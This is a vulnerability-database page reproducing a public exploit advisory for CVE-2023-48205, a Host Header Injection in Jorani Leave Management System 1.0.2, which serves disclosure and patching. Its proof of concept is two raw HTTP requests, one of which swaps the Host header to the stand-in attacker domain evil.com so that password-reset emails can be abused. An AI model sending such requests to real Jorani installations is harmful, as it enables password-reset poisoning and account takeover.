Lucene search
K

Jorani Leave Management System 1.0.2 Host Header Injection

🗓️ 20 Nov 2023 00:00:00Reported by Rahad ChowdhuryType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 628 Views

Jorani LMS v1.0.2 Host Header Injection CVE-2023-4820

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Jorani Leave Management System 1.0.2 Host Header Injection Vulnerability
20 Nov 202300:00
zdt
ATTACKERKB
CVE-2023-48205
7 Dec 202307:15
attackerkb
Circl
CVE-2023-48205
30 Dec 202312:01
circl
CNNVD
Jorani Security Breach
20 Nov 202300:00
cnnvd
CVE
CVE-2023-48205
7 Dec 202300:00
cve
Cvelist
CVE-2023-48205
7 Dec 202300:00
cvelist
EUVD
EUVD-2023-52285
3 Oct 202520:07
euvd
NVD
CVE-2023-48205
7 Dec 202307:15
nvd
Prion
Default credentials
7 Dec 202307:15
prion
`# Exploit Title: Jorani Leave Management System v1.0.2 Host Header Attack  
# Date: 12/11/2023  
# Exploit Author: BugsBD Security Researcher (Rahad Chowdhury)  
# Vendor Homepage: https://jorani.org/  
# Software Link:  
https://github.com/bbalet/jorani/releases/download/v1.0.2/jorani-1.0.2.zip  
# Version: v1.0.2  
# Tested on: Windows 10, PHP version: 8.2.4, Apache/2.4.56  
# CVE: CVE-2023-48205  
  
Descriptions:  
A Host Header Injection vulnerability in Jorani Leave Management System  
1.0.2 may allow an attacker to spoof a particular header. This can be  
exploited by abusing password reset emails.  
  
  
Steps to Reproduce:  
  
1. Request:  
  
GET /jorani/session/login HTTP/1.1  
Host: 192.168.1.74  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like  
Gecko) Chrome/119.0.0.0 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8  
Sec-GPC: 1  
Accept-Language: en-US,en  
Accept-Encoding: gzip, deflate, br  
Cookie: csrf_cookie_jorani=6ebb2e7eeb6867e2a83f96118ca6ecb3;  
jorani_session=pqop598dtj85okrjvh043es6pqp1juag  
Connection: close  
  
2. Now change host name and check browser response. So your request data  
will be:  
  
GET /jorani/session/login HTTP/1.1  
Host: evil.com  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like  
Gecko) Chrome/119.0.0.0 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8  
Sec-GPC: 1  
Accept-Language: en-US,en  
Accept-Encoding: gzip, deflate, br  
Cookie: csrf_cookie_jorani=6ebb2e7eeb6867e2a83f96118ca6ecb3;  
jorani_session=pqop598dtj85okrjvh043es6pqp1juag  
Connection: close  
  
## Reproduce:  
[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48205)  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation